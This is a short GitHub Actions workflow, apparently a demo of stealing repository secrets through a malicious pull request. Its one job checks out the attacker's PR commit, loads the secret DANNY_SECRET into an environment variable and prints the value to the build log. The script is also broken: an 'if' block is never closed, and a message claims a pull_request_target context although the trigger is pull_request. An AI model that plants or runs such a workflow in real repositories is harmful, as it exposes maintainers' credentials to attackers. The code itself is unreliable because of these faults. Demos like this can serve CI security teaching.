name: Malicious PR Workflow - Secret Exfiltration Demo

on:
  pull_request:
    types: [opened, synchronize, reopened]

jobs:
  steal_secret_job:
    runs-on: ubuntu-latest
    steps:
      - name: Checkout code from PR (Attackers Code)
        uses: actions/checkout@v4
        with:
          ref: ${{ github.event.pull_request.head.sha }}

      - name: Exfiltrate DANNY_SECRET
        env:
          # This makes the secret available as an environment variable to the script
          LEAKED_DANNY_SECRET: ${{ secrets.DANNY_SECRET }}
        run: |
          echo "Malicious workflow step running in pull_request_target context!"
          echo "Attempting to access and exfiltrate DANNY_SECRET..."

          if [ -n "$LEAKED_DANNY_SECRET" ]; then
            echo "SUCCESS! DANNY_SECRET has been accessed."
            echo "Value of DANNY_SECRET: $LEAKED_DANNY_SECRET"
          
          echo "Malicious step finished."
